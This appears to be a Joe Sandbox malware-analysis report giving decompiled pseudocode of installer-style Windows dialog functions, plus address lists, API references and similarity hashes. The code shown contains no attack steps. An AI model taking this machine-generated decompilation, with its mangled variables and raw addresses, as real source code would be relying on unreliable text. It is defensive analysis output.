                                                                                                                                                                                                  0x004021d2
                                                                                                                                                                                                  0x004021d9
                                                                                                                                                                                                  0x004021d9
                                                                                                                                                                                                  0x004021dc
                                                                                                                                                                                                  0x004021e5
                                                                                                                                                                                                  0x004021e8
                                                                                                                                                                                                  0x004021ee
                                                                                                                                                                                                  0x004021f0
                                                                                                                                                                                                  0x004021fa
                                                                                                                                                                                                  0x004021fa
                                                                                                                                                                                                  0x004021fd
                                                                                                                                                                                                  0x00402206
                                                                                                                                                                                                  0x00402209
                                                                                                                                                                                                  0x00402212
                                                                                                                                                                                                  0x00402218
                                                                                                                                                                                                  0x0040221a
                                                                                                                                                                                                  0x00402228
                                                                                                                                                                                                  0x00402228
                                                                                                                                                                                                  0x0040222b
                                                                                                                                                                                                  0x00402231
                                                                                                                                                                                                  0x00402231
                                                                                                                                                                                                  0x00402234
                                                                                                                                                                                                  0x0040223a
                                                                                                                                                                                                  0x00402240
                                                                                                                                                                                                  0x00402255
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00402240
                                                                                                                                                                                                  0x0040224b
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                                                                                  • Opcode ID: 3c2a2362cff053ae1d7c0e75c0f1ca74f1c8bad5071b28ade88948ea9147a890
                                                                                                                                                                                                  • Instruction ID: 9bf21a461f45ca9ede348bf2f5d3e2a4fdca70f5c54a4bf8f8a9e28148a02939
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c2a2362cff053ae1d7c0e75c0f1ca74f1c8bad5071b28ade88948ea9147a890
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB414971A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB44
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                                                  			E00403E86(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x446710 = _t37;
					if(_t118 == 0x110) {
						 *0x470248 = _t128;
						 *0x446724 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4366f0 = _t94;
						E0040435F(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x468228);
						 *0x46820c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x446710 = 1;
					}
					_t125 =  *0x40a39c; // 0xffffffff
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x470280;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E004043AB(0x40b);
						while(1) {
							_t39 =  *0x446710;
							 *0x40a39c =  *0x40a39c + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0xffffffff
							__eflags = _t41 -  *0x470284;
							if(_t41 ==  *0x470284) {
								E0040140B(1);
							}
							__eflags =  *0x46820c - _t136;
							if( *0x46820c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x470284; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E0040640A(_t119, _t128, _t133, 0x4e9000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E0040435F(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E0040435F(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E0040435F(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x4702ec - _t136;
							_v32 = _t51;
							if( *0x4702ec != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008);
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100);
							E00404381(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x4366f0, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x4702ec - _t136;
							if( *0x4702ec == _t136) {
								_push( *0x446724);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x4366f0);
							}
							E00404394();
							E004063E8(0x446728, E00403E67());
							E0040640A(0x446728, _t128, _t133,  &(0x446728[lstrlenW(0x446728)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x446728);
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x468218);
									 *0x43e700 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x470240,  *_t133 +  *0x468220 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t76 - _t136;
									 *0x468218 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E0040435F(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x468218, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x46820c - _t136;
									if( *0x46820c != _t136) {
										goto L61;
									}
									ShowWindow( *0x468218, 8);
									E004043AB(0x405);
									goto L58;
								}
								__eflags =  *0x4702ec - _t136;
								if( *0x4702ec != _t136) {
									goto L61;
								}
								__eflags =  *0x4702e0 - _t136;
								if( *0x4702e0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x468218);
						 *0x470248 = _t136;
						EndDialog(_t128,  *0x43a6f8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x468218, 0x40f, 0, 1);
						__eflags =  *0x46820c;
						return 0 |  *0x46820c == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x446708, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x446708,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E004043C6(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x468218, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4702ec - _t136;
										if( *0x4702ec == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x43a6f8 = 1;
											L21:
											_push(0x78);
											L22:
											E00404338();
											goto L26;
										}
										E0040140B(_t130);
										 *0x43a6f8 = _t130;
										goto L21;
									}
									__eflags =  *0x40a39c - _t136; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x468218);
						 *0x468218 = _a12;
						L58:
						if( *0x456728 == _t136 &&  *0x468218 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x456728 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                                                                                                                                  0x00403e8f
                                                                                                                                                                                                  0x00403e98
                                                                                                                                                                                                  0x00403fd9
                                                                                                                                                                                                  0x00403fdd
                                                                                                                                                                                                  0x00403fe1
                                                                                                                                                                                                  0x00403fe3
                                                                                                                                                                                                  0x00403fe8
                                                                                                                                                                                                  0x00403ff3
                                                                                                                                                                                                  0x00403ffe
                                                                                                                                                                                                  0x00404003
                                                                                                                                                                                                  0x00404005
                                                                                                                                                                                                  0x00404007
                                                                                                                                                                                                  0x0040400a
                                                                                                                                                                                                  0x0040400f
                                                                                                                                                                                                  0x0040401d
                                                                                                                                                                                                  0x0040402a
                                                                                                                                                                                                  0x00404031
                                                                                                                                                                                                  0x00404031
                                                                                                                                                                                                  0x00404032
                                                                                                                                                                                                  0x00404032
                                                                                                                                                                                                  0x00404037
                                                                                                                                                                                                  0x0040403d
                                                                                                                                                                                                  0x00404044
                                                                                                                                                                                                  0x0040404a
                                                                                                                                                                                                  0x0040404c
                                                                                                                                                                                                  0x0040408c
                                                                                                                                                                                                  0x00404091
                                                                                                                                                                                                  0x00404096
                                                                                                                                                                                                  0x00404096
                                                                                                                                                                                                  0x0040409b
                                                                                                                                                                                                  0x004040a4
                                                                                                                                                                                                  0x004040a6
                                                                                                                                                                                                  0x004040ab
                                                                                                                                                                                                  0x004040b1
                                                                                                                                                                                                  0x004040b5
                                                                                                                                                                                                  0x004040b5
                                                                                                                                                                                                  0x004040ba
                                                                                                                                                                                                  0x004040c0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004040cb
                                                                                                                                                                                                  0x004040d1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004040da
                                                                                                                                                                                                  0x004040e2
                                                                                                                                                                                                  0x004040e7
                                                                                                                                                                                                  0x004040ea
                                                                                                                                                                                                  0x004040f0
                                                                                                                                                                                                  0x004040f5
                                                                                                                                                                                                  0x004040f8
                                                                                                                                                                                                  0x004040fe
                                                                                                                                                                                                  0x00404103
                                                                                                                                                                                                  0x00404106
                                                                                                                                                                                                  0x0040410c
                                                                                                                                                                                                  0x00404114
                                                                                                                                                                                                  0x0040411a
                                                                                                                                                                                                  0x00404120
                                                                                                                                                                                                  0x00404124
                                                                                                                                                                                                  0x0040412b
                                                                                                                                                                                                  0x0040412b
                                                                                                                                                                                                  0x0040412b
                                                                                                                                                                                                  0x00404135
                                                                                                                                                                                                  0x00404147
                                                                                                                                                                                                  0x00404153
                                                                                                                                                                                                  0x00404158
                                                                                                                                                                                                  0x00404162
                                                                                                                                                                                                  0x00404168
                                                                                                                                                                                                  0x0040416a
                                                                                                                                                                                                  0x0040416f
                                                                                                                                                                                                  0x0040416c
                                                                                                                                                                                                  0x0040416c
                                                                                                                                                                                                  0x0040416c
                                                                                                                                                                                                  0x0040417f
                                                                                                                                                                                                  0x00404197
                                                                                                                                                                                                  0x00404199
                                                                                                                                                                                                  0x0040419f
                                                                                                                                                                                                  0x004041b4
                                                                                                                                                                                                  0x004041a1
                                                                                                                                                                                                  0x004041aa
                                                                                                                                                                                                  0x004041ac
                                                                                                                                                                                                  0x004041ac
                                                                                                                                                                                                  0x004041ba
                                                                                                                                                                                                  0x004041cb
                                                                                                                                                                                                  0x004041e1
                                                                                                                                                                                                  0x004041e8
                                                                                                                                                                                                  0x004041ee
                                                                                                                                                                                                  0x004041f2
                                                                                                                                                                                                  0x004041f7
                                                                                                                                                                                                  0x004041f9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004041ff
                                                                                                                                                                                                  0x004041ff
                                                                                                                                                                                                  0x00404201
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404207
                                                                                                                                                                                                  0x0040420b
                                                                                                                                                                                                  0x00404230
                                                                                                                                                                                                  0x00404236
                                                                                                                                                                                                  0x0040423c
                                                                                                                                                                                                  0x0040423e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404264
                                                                                                                                                                                                  0x0040426a
                                                                                                                                                                                                  0x0040426c
                                                                                                                                                                                                  0x00404271
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404277
                                                                                                                                                                                                  0x0040427a
                                                                                                                                                                                                  0x0040427d
                                                                                                                                                                                                  0x00404294
                                                                                                                                                                                                  0x004042a0
                                                                                                                                                                                                  0x004042b9
                                                                                                                                                                                                  0x004042bf
                                                                                                                                                                                                  0x004042c3
                                                                                                                                                                                                  0x004042c8
                                                                                                                                                                                                  0x004042ce
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004042d8
                                                                                                                                                                                                  0x004042e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004042e3
                                                                                                                                                                                                  0x0040420d
                                                                                                                                                                                                  0x00404213
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404219
                                                                                                                                                                                                  0x0040421f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404225
                                                                                                                                                                                                  0x004041f9
                                                                                                                                                                                                  0x004042f0
                                                                                                                                                                                                  0x004042fc
                                                                                                                                                                                                  0x00404303
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040404e
                                                                                                                                                                                                  0x0040404e
                                                                                                                                                                                                  0x00404051
                                                                                                                                                                                                  0x00404084
                                                                                                                                                                                                  0x00404084
                                                                                                                                                                                                  0x00404086
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404086
                                                                                                                                                                                                  0x00404053
                                                                                                                                                                                                  0x00404057
                                                                                                                                                                                                  0x0040405c
                                                                                                                                                                                                  0x0040405e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040406e
                                                                                                                                                                                                  0x00404076
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040407c
                                                                                                                                                                                                  0x00403eaa
                                                                                                                                                                                                  0x00403eaa
                                                                                                                                                                                                  0x00403eae
                                                                                                                                                                                                  0x00403eb3
                                                                                                                                                                                                  0x00403ec2
                                                                                                                                                                                                  0x00403ec2
                                                                                                                                                                                                  0x00403ecb
                                                                                                                                                                                                  0x00403ed4
                                                                                                                                                                                                  0x00403edf
                                                                                                                                                                                                  0x00403edf
                                                                                                                                                                                                  0x00403eeb
                                                                                                                                                                                                  0x00403f07
                                                                                                                                                                                                  0x00403f0a
                                                                                                                                                                                                  0x00403f1d
                                                                                                                                                                                                  0x00403f23
                                                                                                                                                                                                  0x00403fc6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403fcf
                                                                                                                                                                                                  0x00403f29
                                                                                                                                                                                                  0x00403f36
                                                                                                                                                                                                  0x00403f38
                                                                                                                                                                                                  0x00403f3a
                                                                                                                                                                                                  0x00403f59
                                                                                                                                                                                                  0x00403f59
                                                                                                                                                                                                  0x00403f5c
                                                                                                                                                                                                  0x00403f61
                                                                                                                                                                                                  0x00403f64
                                                                                                                                                                                                  0x00403f74
                                                                                                                                                                                                  0x00403f75
                                                                                                                                                                                                  0x00403f77
                                                                                                                                                                                                  0x00403fad
                                                                                                                                                                                                  0x00403fc0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403fc0
                                                                                                                                                                                                  0x00403f79
                                                                                                                                                                                                  0x00403f7f
                                                                                                                                                                                                  0x00403f98
                                                                                                                                                                                                  0x00403f9d
                                                                                                                                                                                                  0x00403f9f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403fa1
                                                                                                                                                                                                  0x00403f8d
                                                                                                                                                                                                  0x00403f8d
                                                                                                                                                                                                  0x00403f8f
                                                                                                                                                                                                  0x00403f8f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403f8f
                                                                                                                                                                                                  0x00403f82
                                                                                                                                                                                                  0x00403f87
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403f87
                                                                                                                                                                                                  0x00403f66
                                                                                                                                                                                                  0x00403f6c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403f6e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403f6e
                                                                                                                                                                                                  0x00403f5e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403f5e
                                                                                                                                                                                                  0x00403f44
                                                                                                                                                                                                  0x00403f4b
                                                                                                                                                                                                  0x00403f51
                                                                                                                                                                                                  0x00403f53
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403f53
                                                                                                                                                                                                  0x00403f0f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00403eed
                                                                                                                                                                                                  0x00403ef3
                                                                                                                                                                                                  0x00403efd
                                                                                                                                                                                                  0x00404309
                                                                                                                                                                                                  0x0040430f
                                                                                                                                                                                                  0x0040431c
                                                                                                                                                                                                  0x00404322
                                                                                                                                                                                                  0x00404322
                                                                                                                                                                                                  0x0040432c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040432c
                                                                                                                                                                                                  0x00403eeb

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                                                                                                  • SetWindowLongW.USER32 ref: 00403F0F
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403F30
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403FF9
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404003
                                                                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404114
                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                                                                                                  • EnableMenuItem.USER32 ref: 0040417F
                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                                                                                                  • lstrlenW.KERNEL32(00446728,?,00446728,00000000), ref: 004041D4
                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00446728), ref: 004041E8
                                                                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                  • String ID: (gD
                                                                                                                                                                                                  • API String ID: 184305955-2450699939
                                                                                                                                                                                                  • Opcode ID: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                  • Instruction ID: dffee297adc4390e0108bf821a76a55ee3af39d38e00891df0cde6976b1e4786
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51C1B3B1540600EFDB216FA1EE85D2B3BA8EB85706F10053EFB41B11F1CB7998919B5E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                  			E0040451E(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4366f4 =  *0x4366f4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004043C6(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4601e0;
							if(_t103 - _t113 < 0x4000) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E004047CD(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x470248, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x470248, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4366f4 != 0) {
						goto L27;
					} else {
						_t116 =  *0x43e700 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404381(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004047A9();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x46821c - 4 + _t75 * 4);
				}
				_t76 =  *0x470298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E004044CF;
				if(_t110 != 2) {
					_v8 = E00404495;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E0040435F(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E0040435F(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404381( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404394(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x470254 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4366f4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4366f4 = 0;
				return 0;
			}


















                                                                                                                                                                                                  0x00404530
                                                                                                                                                                                                  0x0040465d
                                                                                                                                                                                                  0x004046ba
                                                                                                                                                                                                  0x004046be
                                                                                                                                                                                                  0x0040478b
                                                                                                                                                                                                  0x0040478d
                                                                                                                                                                                                  0x0040478d
                                                                                                                                                                                                  0x00404793
                                                                                                                                                                                                  0x00404793
                                                                                                                                                                                                  0x00404796
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040479d
                                                                                                                                                                                                  0x004046cc
                                                                                                                                                                                                  0x004046d2
                                                                                                                                                                                                  0x004046dc
                                                                                                                                                                                                  0x004046e7
                                                                                                                                                                                                  0x004046ea
                                                                                                                                                                                                  0x004046ed
                                                                                                                                                                                                  0x004046f8
                                                                                                                                                                                                  0x004046fb
                                                                                                                                                                                                  0x00404702
                                                                                                                                                                                                  0x0040470f
                                                                                                                                                                                                  0x00404720
